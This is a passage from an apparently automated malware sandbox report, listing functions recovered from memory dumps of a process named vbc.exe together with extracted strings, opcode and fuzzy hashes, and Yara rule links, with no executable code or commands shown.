Opcode Fuzzy Hash: 15d8a76bed62ac2df0f88e50f87c00fec801aab715dc3a28bfc105d98e930006
Instruction Fuzzy Hash: B86107B8D6524ACFCB04CFA9D5809EEFBF2BF98310F24942AD415A7211D3749992CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006667F0, Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

n[s, xrefs: 00666AA7

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID: n[s
API String ID: 0-4183114565
Opcode ID: 5d5937450793be507d3b0e5432502fb4ce3c8649db21ed621220f4292024d661
Instruction ID: 40e93d47b58cf5bc2250a7e88fb3a4e1da26b5d942840b6879532e9f0aa09fce
Opcode Fuzzy Hash: 5d5937450793be507d3b0e5432502fb4ce3c8649db21ed621220f4292024d661
Instruction Fuzzy Hash: 4DA11874E05209CFCB44CFE6E5915AEFBB2BF89300F24952EE416AB254D7349902CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0021C931, Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

>.\,, xrefs: 0021C9FD

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: >.\,
API String ID: 0-666191327
Opcode ID: 3b47eea1f36d3fb6cc8755f88f303e70d25b3cee8a47d0afed9105d7cd457dc7
Instruction ID: 0697d5c6b7309d4751272f4ab0cdc9aaf475c0d75baed6771254a0fd64ac7df2
Opcode Fuzzy Hash: 3b47eea1f36d3fb6cc8755f88f303e70d25b3cee8a47d0afed9105d7cd457dc7
Instruction Fuzzy Hash: 7171F774E29209CFCB04CFA9D5815EEFBF2BB98310F24942AD405F7224D3749A91CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0021932A, Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

W,`4, xrefs: 00219423

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: W,`4
API String ID: 0-41994385
Opcode ID: 7fc4c793df14a13a15c28dbca9d9906346377128302725e65b189ec4752bd4cc
Instruction ID: ddff1cbe8d0f6bd63bd17fb105d7f27022ba8d5119c5a3d9ee7ffdbd30186a7e
Opcode Fuzzy Hash: 7fc4c793df14a13a15c28dbca9d9906346377128302725e65b189ec4752bd4cc
Instruction Fuzzy Hash: 167127B4E1420ADFCB05CF99D4909EEFBF2FB98310F14856AD415AB254D3349A92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0021B521, Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

Sr0s, xrefs: 0021B5C6

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: Sr0s
API String ID: 0-3116619035
Opcode ID: 8b64067a27bb4a2e6dec0d826ac22f5052ffadaaaf9aa3e628e9f32b181c8615
Instruction ID: 10c778420b20a38a31f0dca78bcd5c26075ed9c6b66485c4dc8f936dff2008a9
Opcode Fuzzy Hash: 8b64067a27bb4a2e6dec0d826ac22f5052ffadaaaf9aa3e628e9f32b181c8615
Instruction Fuzzy Hash: 7B71EF34E252099FCB45CFAAD48499EFBF2FF99310F14C56AE419AB221D734A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0021B530, Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

Sr0s, xrefs: 0021B5C6

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: Sr0s
API String ID: 0-3116619035
Opcode ID: 3bb8cf34814fcf9a774f53b4a88cbd1734eee4169caf72e0a3b28e3129dd3ddb
Instruction ID: 256837e5ac87ec8a0041c5e97a48f298be0b982236b4c29db7059f196fdf021e
Opcode Fuzzy Hash: 3bb8cf34814fcf9a774f53b4a88cbd1734eee4169caf72e0a3b28e3129dd3ddb
Instruction Fuzzy Hash: 7271BE74E21219AFCB44CFAAD48499EFBF2FF98310F14D56AE419AB220D734A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0021C738, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

N$L, xrefs: 0021C78C

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID: N$L
API String ID: 0-3755560353
Opcode ID: fdce3208d2c1b6d88bcd6de916b0ca8df4d8350f8b0dcc214c911700c3000671
Instruction ID: 6a8c49f76337e9f702d7af285201f4853ebc260eebd4f2888c966e241212522c
Opcode Fuzzy Hash: fdce3208d2c1b6d88bcd6de916b0ca8df4d8350f8b0dcc214c911700c3000671
Instruction Fuzzy Hash: EB41F7B5E1420A9FDB44CFAAC4815EEFBF6BF98300F24C42AC415B7254D3745A528F94

Uniqueness

Uniqueness Score: -1.00%

Function 002188D1, Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f581298d0a26cfd895346e15aff16610e9c1a2b7063db43f01def3c20651180
Instruction ID: 1ccd790eea5edd4f6c275209ba21567b5dcbfef90763a94fb7e4cf7d9e60fe12
Opcode Fuzzy Hash: 6f581298d0a26cfd895346e15aff16610e9c1a2b7063db43f01def3c20651180
Instruction Fuzzy Hash: 41B12B70E2121A9FDB54DFE4D880ADEBBB6FF88300F108665D415AB355DB30AA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00660478, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311411d1b7150db8c9bbe2cab5cb6bf55431527ad52873bded80373652c52592
Instruction ID: e8f5cc0bfeb0cfb12a4ee38ac7c7365fa76edda5cb04abc563e2fd3698ada8fa
Opcode Fuzzy Hash: 311411d1b7150db8c9bbe2cab5cb6bf55431527ad52873bded80373652c52592
Instruction Fuzzy Hash: 84814A70E1415A8FDB14DBA9D58099EFBF3EB89304F24C56AD819A721AD7309942CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00666BC8, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439e2adecaf6ec62ad8ea126480d2361c8808af682c1c0c6d0f242fbabada031
Instruction ID: 33dfd00f317532733290ad6608119ad55c16441d610dd42b24594fb7f22666b3
Opcode Fuzzy Hash: 439e2adecaf6ec62ad8ea126480d2361c8808af682c1c0c6d0f242fbabada031
Instruction Fuzzy Hash: 75613A70E04669CBDB68CF66CC407E9FAB3BF89300F14D5EAD40DA6614E7705A868F40

Uniqueness

Uniqueness Score: -1.00%

Function 0021C3C1, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545cb80e9fadc45eee80b404f95daee347a7257bf4ea39ccb5eb32fecfb216d8
Instruction ID: 9bcfdb29002af7f2c2c607a96c160429b3440870b2c163c5f70aee7e76f99410
Opcode Fuzzy Hash: 545cb80e9fadc45eee80b404f95daee347a7257bf4ea39ccb5eb32fecfb216d8
Instruction Fuzzy Hash: 646137B8D2424A9BCB14CFA5D4915EEFBF2BF58300F24846AD015B7354D374AA92CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0021D924, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6df8b3ed6c22c8db9309a8a3795e622ff00462faeaa8c9d9563247b5bee398
Instruction ID: 485a48b6a93507f718a7948e327debf0e635f5b32ef582c700f7a4f683b61849
Opcode Fuzzy Hash: eb6df8b3ed6c22c8db9309a8a3795e622ff00462faeaa8c9d9563247b5bee398
Instruction Fuzzy Hash: 4B519D71D15658CFDB29CF6B8D4429AFBF3AFC9311F14C1BA854CAA265EB3009868F11

Uniqueness

Uniqueness Score: -1.00%

Function 00666DEA, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e75d48b6933b6b559f73c33b32dfae8c7e2aece6ea05853a2067113471da3cd
Instruction ID: 397ef9e40a918c2432630be83eaa4956f4cd485209de38d8c96180bd26f8cab8
Opcode Fuzzy Hash: 8e75d48b6933b6b559f73c33b32dfae8c7e2aece6ea05853a2067113471da3cd
Instruction Fuzzy Hash: F1513774D0466ACBCB64CF65D840BDDF7B2BF89300F1496EAD509A3614E730AAD68F40

Uniqueness

Uniqueness Score: -1.00%

Function 00666DAF, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8bfab0a6fdb92d9c4bf61012f6e83d1e63f56327a083b6e83719333814aff4
Instruction ID: 81afd8dcde531f8ded9df1ae8a1795ffd50c6f084446be316485e2a77b17f391
Opcode Fuzzy Hash: bd8bfab0a6fdb92d9c4bf61012f6e83d1e63f56327a083b6e83719333814aff4
Instruction Fuzzy Hash: 7E511874E0466ACBDB64CF65DC40B9DB7B2BF89300F1096EAD50AA3614E7309AD68F40

Uniqueness

Uniqueness Score: -1.00%

Function 002119F8, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8fb180ce931d7176f4a765cc8ab51ee358ff841257c5a4fb089021c5bc1c2dc
Instruction ID: dd6b9b9755099ff76b7fa14843af626f1cbf0eeeb459fd96f44ee3af0afdb23f
Opcode Fuzzy Hash: d8fb180ce931d7176f4a765cc8ab51ee358ff841257c5a4fb089021c5bc1c2dc
Instruction Fuzzy Hash: 8E4183B4E2810DEF8744CE69C8401EDBBF2AB99304BA4C975D506EB358E774DB629F10

Uniqueness

Uniqueness Score: -1.00%

Function 002145B0, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750f4dc93639b4ffbf65590b65ca82cf3d2b203eb8819f602b9dd7fe46704c1b
Instruction ID: 72700ca77d77d6554b02fafc5fab4a274122bc4437f54ce117463068b8324a04
Opcode Fuzzy Hash: 750f4dc93639b4ffbf65590b65ca82cf3d2b203eb8819f602b9dd7fe46704c1b
Instruction Fuzzy Hash: 5141F678E34109AF9700DBFAD80059AB7F1AB69341B14D4A6945ADB340D738DA52CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002145C0, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf8f597cc9c3ba96e7bb242de809b30bcdeb33a3b8f8f1c8dabf18751670dfc
Instruction ID: 6bc0c369895c17856da300850db3d71a0bf4e918372efbea7d03eea3982867e4
Opcode Fuzzy Hash: 4bf8f597cc9c3ba96e7bb242de809b30bcdeb33a3b8f8f1c8dabf18751670dfc
Instruction Fuzzy Hash: 2131B578E34109DF9700DFFAD4005AAF7F5ABA9341B24D465945EDB340E778D5A28F04

Uniqueness

Uniqueness Score: -1.00%

Function 006626B1, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5c533b385da9fbeac68162acf6a80fb3ef89bc9c652c3076d326774c556a5c
Instruction ID: e81da5a691fa192cca05df4d7bf3914cf72c8c8d5a8dab51f1413ed95f08f24b
Opcode Fuzzy Hash: ed5c533b385da9fbeac68162acf6a80fb3ef89bc9c652c3076d326774c556a5c
Instruction Fuzzy Hash: B031CE71D097858FCB06CFAA985159ABFF2AF8A200F08C1AFD449A6252D3345A12CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00661188, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fdb4029775858e754cd9ad5d6a4d5d538df96529f43b98590d223f0b63ce870
Instruction ID: e6cf2d579e9aafe6ed76da1967a26d2bd8e9673c3338867510a62242d661342c
Opcode Fuzzy Hash: 1fdb4029775858e754cd9ad5d6a4d5d538df96529f43b98590d223f0b63ce870
Instruction Fuzzy Hash: CB313770E152189FDB58CFAAD94169EFBF7EB89310F14C0AAD409AB325D7309A818B51

Uniqueness

Uniqueness Score: -1.00%

Function 006684D8, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e419024369e5b4455ebe13d16c692bedc7bd9182e15cc01bdd5601f4acf8313
Instruction ID: 9c6e8ce050efd8f264d64224f413053811b057c805a5cd5301f4d5af7fd646d1
Opcode Fuzzy Hash: 5e419024369e5b4455ebe13d16c692bedc7bd9182e15cc01bdd5601f4acf8313
Instruction Fuzzy Hash: B0312470D05228CFDB50DFB5C848BEDBBF2AB4A304F24856AE406B3291DB749985DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00661198, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 797e6fa62981400bc88a90ccf1a00310038202cd84c767506fc4ae9e0b9dfcc0
Instruction ID: 1482db226e5f8ac2dce54a1a95d7631787105438d8ac3e2a9acac09a36c60c68
Opcode Fuzzy Hash: 797e6fa62981400bc88a90ccf1a00310038202cd84c767506fc4ae9e0b9dfcc0
Instruction Fuzzy Hash: 4C313870E112189FDB58CFAAD941B9EFBF7EBC9300F14C06A9409AB315DB309A818F51

Uniqueness

Uniqueness Score: -1.00%

Function 002179E8, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0b6cadc44e65611c0fda24dfef8e4ff0e645a4a44273e002181cc50c8e6659
Instruction ID: 5a7346cfc4ff8026f875875219fee4e11a1e617fb7c498f8b97b055e5e7cee77
Opcode Fuzzy Hash: 0f0b6cadc44e65611c0fda24dfef8e4ff0e645a4a44273e002181cc50c8e6659
Instruction Fuzzy Hash: 07210E71E146589FEB08CFAB9C406DEFBF7AFC9200F08C0BAC558A6225DB3455558F51

Uniqueness

Uniqueness Score: -1.00%

Function 0021CD89, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148253238.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f2c9cb592959aeddfb44b3db69e2b711aa28969bc4aac7a3eed674819104e5
Instruction ID: 3b30664ce3fa1987276a390a62e6ac5bc1e2cd40498cbcd8378c0e6a61169ef5
Opcode Fuzzy Hash: 51f2c9cb592959aeddfb44b3db69e2b711aa28969bc4aac7a3eed674819104e5
Instruction Fuzzy Hash: F121FC71E156589BEB19CFABD8046DEFFF3AFC9200F18C1BAC408AA265DB3415568F11

Uniqueness

Uniqueness Score: -1.00%

Function 00660AE8, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0399ba88017f76c05c746c7366e1fb354d5816b336f8abdce0a4fd4287c651
Instruction ID: 98e9c2bce266bf07a3eccc1cd5bb7378555c850c144e68c50ca0665095c4c671
Opcode Fuzzy Hash: 3e0399ba88017f76c05c746c7366e1fb354d5816b336f8abdce0a4fd4287c651
Instruction Fuzzy Hash: 4E111471E102199BEB48CFAAD8406EEFBF7ABC8210F18C17AD408A7214EB305A418F51

Uniqueness

Uniqueness Score: -1.00%

Function 00662710, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2148353190.0000000000660000.00000040.00000001.sdmp, Offset: 00660000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521a2d74d23bfbf492fad5e6e9adc4f2cd4815e0f06ac9783c6c5d951e4b3221
Instruction ID: 5cb1e444604a6d92d6a015d0fc83d8dd9c1617a929aee5e40bfebcedb8ea1513
Opcode Fuzzy Hash: 521a2d74d23bfbf492fad5e6e9adc4f2cd4815e0f06ac9783c6c5d951e4b3221
Instruction Fuzzy Hash: 1E11F870E116199BDB48CFABD94069EFAF7AFC8300F14C07AD408A6364EB345A45CF51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 3044 Parent PID: 2916 vbc.exeCOMMON

Executed Functions

Function 00355380, Relevance: 3.3, Strings: 2, Instructions: 843COMMON

Download Yara Rule

Strings

BZ, xrefs: 003553BA
BZ, xrefs: 00355815

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID: BZ$BZ
API String ID: 0-39768918
Opcode ID: b9fe58c3fd30f2194b592159ef17efecea337973a59e4a1223b6485160dfa702
Instruction ID: cf1a9ffa4734a3cbe2a9301c0967a431ca09d00bcdb5def0b6d0cbc2ebc77565
Opcode Fuzzy Hash: b9fe58c3fd30f2194b592159ef17efecea337973a59e4a1223b6485160dfa702
Instruction Fuzzy Hash: CA727C34A002048FCB15EFB4C858BADBBB2AF88305F1585A9E50ADB365DF74AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 003552D2, Relevance: 3.3, Strings: 2, Instructions: 789COMMON

Download Yara Rule

Strings

BZ, xrefs: 003553BA
BZ, xrefs: 00355815

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID: BZ$BZ
API String ID: 0-39768918
Opcode ID: 960eaf7cdd4cd439ec9f8874fbcdae0d4c0cdfd63298d2a7563c7d1d2dc4a72b
Instruction ID: c9e16a362d2af4e4c5a16074688673adcb2b99086bd98603cd64b91664fa4455
Opcode Fuzzy Hash: 960eaf7cdd4cd439ec9f8874fbcdae0d4c0cdfd63298d2a7563c7d1d2dc4a72b
Instruction Fuzzy Hash: 8C626934A002048FCB15EFB4C858BADBBB2AF88305F1585A9E50ADB365DF74AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00359830, Relevance: 2.9, Instructions: 2867COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e57ef1fc2c8b2728adb7198843f1c275554c1f046178ee6bc19af5f02b8c62
Instruction ID: a448d1ca6fb9cd913b161c7112a63bacc04d3a5a4f0ca5e3d5b172c0a9924f90
Opcode Fuzzy Hash: d2e57ef1fc2c8b2728adb7198843f1c275554c1f046178ee6bc19af5f02b8c62
Instruction Fuzzy Hash: B9530F31D1071A8ECB11EF68C884A99F7B1FF99304F15D79AE4586B121EB70AAD4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00359B0C, Relevance: 2.6, Instructions: 2606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe59d0acbfe34580165e4a4aa11ff2aac56450e7a5faa88936fd9d232ac49d2d
Instruction ID: 689335a45851c5fc2bd5e2fbbd505eb5aab4890b1e2ebbb2e21936adbae4df94
Opcode Fuzzy Hash: fe59d0acbfe34580165e4a4aa11ff2aac56450e7a5faa88936fd9d232ac49d2d
Instruction Fuzzy Hash: 0D53EE30D10B1A8ECB11EF68C884A99F7B1FF99304F15D79AE45867121EB71AAD4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00356A30, Relevance: 2.0, Strings: 1, Instructions: 760COMMON

Download Yara Rule

Strings

4IZ, xrefs: 00356B8E

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID: 4IZ
API String ID: 0-1982257400
Opcode ID: 3a1cf81bd7aa03a7052c8c863e316fcb0ef844716eb89ebcdf19d5dc4f216f6e
Instruction ID: 282f02ef4d6f131e112120eca0feca659af46801305c4b20f8a99f7a56ed3d2f
Opcode Fuzzy Hash: 3a1cf81bd7aa03a7052c8c863e316fcb0ef844716eb89ebcdf19d5dc4f216f6e
Instruction Fuzzy Hash: DD622B30E047188FCB25EF78C854A9DB7B5BF89304F1185A9D54AAB260EF719E85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00354600, Relevance: 1.9, Strings: 1, Instructions: 618COMMON

Download Yara Rule

Strings

j, xrefs: 003549D2

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: b93ced56952e953d8cfdc427024ddf9ef3a5c944db685a0febf6213fb018ca50
Instruction ID: 6cef60645a93df645bc8cd1d3d736ce990d6a778cc05164b00fde5bae5a3e36d
Opcode Fuzzy Hash: b93ced56952e953d8cfdc427024ddf9ef3a5c944db685a0febf6213fb018ca50
Instruction Fuzzy Hash: 55221230B002049FDB14EBB4D849FAE77F2AF84319F158568E9169B3A1DF34DC898B91

Uniqueness

Uniqueness Score: -1.00%

Function 0035CC03, Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4bdc3e6846fc1bbffb915a63ac08c8cf6a62f6ab9b5d90564ef42d7726a0ec
Instruction ID: d33f91999fda569dc5774c0e85484664a34af65f13e2edbaa66181f0d047f368
Opcode Fuzzy Hash: 3f4bdc3e6846fc1bbffb915a63ac08c8cf6a62f6ab9b5d90564ef42d7726a0ec
Instruction Fuzzy Hash: E602C130B002049FDB15DBB8C945BAEB7F6AF89304F158468E419EB3A5DB74DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003514B8, Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bd729b0712162d0252dcffa2fa0510297d5d09a9d1abfd6ec105568c9333a2
Instruction ID: c0c80bef1c278cd8c936a0b91c9812019877292eaf1610b1175c590cf1e48376
Opcode Fuzzy Hash: c3bd729b0712162d0252dcffa2fa0510297d5d09a9d1abfd6ec105568c9333a2
Instruction Fuzzy Hash: F2E19D30E002089FCB15DFB8C894BADB7B2AF84315F158529D815EB3A5DB75EC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00350048, Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9583b610ac9424c15eb481f5ee31326a8505d53291b9148235a50d075f5c6886
Instruction ID: f63a1f576aefea62f99758c34648bf302c3acf67d041e0358de1975408d6c396
Opcode Fuzzy Hash: 9583b610ac9424c15eb481f5ee31326a8505d53291b9148235a50d075f5c6886
Instruction Fuzzy Hash: 25D1D230B002045FDB28EBB4D955BAE7AE7AFC5344F148828E41A9B391DFB5DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 003505C8, Relevance: 4.2, Strings: 3, Instructions: 478COMMON

Download Yara Rule

Strings

Hil, xrefs: 00350617
Hil, xrefs: 003508A6
Hil, xrefs: 00350837

Memory Dump Source

Source File: 00000005.00000002.2345282711.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false

Similarity

API ID:
String ID: Hil$Hil$Hil
API String ID: 0-3070599461
Opcode ID: e7407efb57f97653d2793bf614ee64b9aefbd343ca434c5a7c05838d28e4446e
Instruction ID: f9a1fd467a271236511878acb8a1b7ed00cb4220ca48480fee4af6474ea10cdf
Opcode Fuzzy Hash: e7407efb57f97653d2793bf614ee64b9aefbd343ca434c5a7c05838d28e4446e
Instruction Fuzzy Hash: 7702AE34B002048FCB199BB4D854AADB7F6AF85305F118579D80ADB3A5EB75DC4ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 001E7FD0, Relevance: 4.0, APIs: 2, Instructions: 958COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E809F
KiUserExceptionDispatcher.NTDLL ref: 001E81C9

Memory Dump Source

Source File: 00000005.00000002.2345249860.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 161a5545ab6e654d4591ec277ce7c2215e62098654e12d5b8c69da273e5035ad
Instruction ID: 171bfe848fedc476fd9fce2da17a3b7583067347c87126b8222fc1fa355b3e4c
Opcode Fuzzy Hash: 161a5545ab6e654d4591ec277ce7c2215e62098654e12d5b8c69da273e5035ad
Instruction Fuzzy Hash: D0A215B4A04228CFCB689F34D88869DB7B6BF49305F1184EAD50EA7254CB749EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001E7FF1, Relevance: 3.6, APIs: 2, Instructions: 631COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E809F
KiUserExceptionDispatcher.NTDLL ref: 001E81C9

Memory Dump Source

Source File: 00000005.00000002.2345249860.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fcdd1b05ed04b247a8a454f205053a20f06de8df6f760bdbb9a9fbbba5700dc4
Instruction ID: 4dbaa28c9ee61b52fe073c8c974c4f41f51edf08d4f9fcb2b85951be5e0dba18
Opcode Fuzzy Hash: fcdd1b05ed04b247a8a454f205053a20f06de8df6f760bdbb9a9fbbba5700dc4
Instruction Fuzzy Hash: 135205B4A04228CFCB689F34D88869CB7B6BF49305F2184EAD51EA7254CB349EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001E8036, Relevance: 3.6, APIs: 2, Instructions: 624COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E809F
KiUserExceptionDispatcher.NTDLL ref: 001E81C9

Memory Dump Source

Source File: 00000005.00000002.2345249860.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2aea083af56e444737742aaa44d6c07bf466d40ee6deda42f91d2ca830f1c979
Instruction ID: 4591f7d5a6a857ea9ff20f6cb52a28dc18170170247fdbf751858a465a0659b9
Opcode Fuzzy Hash: 2aea083af56e444737742aaa44d6c07bf466d40ee6deda42f91d2ca830f1c979
Instruction Fuzzy Hash: E45205B4A04228CFCB689F74D88869CB7B6BF49305F2184EAD51EA3254CB349EC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001E807B, Relevance: 3.6, APIs: 2, Instructions: 617COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 001E809F
KiUserExceptionDispatcher.NTDLL ref: 001E81C9

Memory Dump Source

Source File: 00000005.00000002.2345249860.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fd7f7ae2a6dcf4f1206c1245b6e5a8305204d42b66857e04b97bf3aee85152bc
Instruction ID: e476ffbce73a6dee5122c92bfa742cb219de2d7657d06133ada5bec20f74a995
Opcode Fuzzy Hash: fd7f7ae2a6dcf4f1206c1245b6e5a8305204d42b66857e04b97bf3aee85152bc
